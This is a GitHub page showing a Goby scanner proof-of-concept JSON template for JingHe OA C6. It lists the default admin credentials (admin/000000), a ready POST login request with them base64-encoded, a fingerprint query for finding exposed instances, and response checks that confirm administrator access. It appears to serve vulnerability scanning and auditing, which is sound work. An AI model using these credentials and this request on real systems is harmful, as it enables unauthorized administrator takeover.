-
Notifications
You must be signed in to change notification settings - Fork 8
/
JingHe_OA_C6_Default_password.json
62 lines (62 loc) · 2.38 KB
/
JingHe_OA_C6_Default_password.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
{
"Name": "JingHe OA C6 Default password",
"Level": "2",
"Tags": [
"Default password"
],
"GobyQuery": "app=\"Jinher-OA\"",
"Description": "JinHe OA C6 has the default account password of admin/000000, and the attacker will log in as an administrator",
"Product": "JingHe OA C6",
"Homepage": "jinher.com",
"Author": "PeiQi",
"Impact": "<p>The attacker will log in as an administrator</p>",
"Recommandation": "",
"References": [
"http://wiki.peiqi.tech"
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/C6/Jhsoft.Web.login/AjaxForLogin.aspx",
"follow_redirect": false,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "type=login&loginCode=YWRtaW4=&&pwd=MDAwMDAw&"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "OK",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "系统管理员",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "2021-04-04 22:43:50",
"GobyVersion": "1.8.255"
}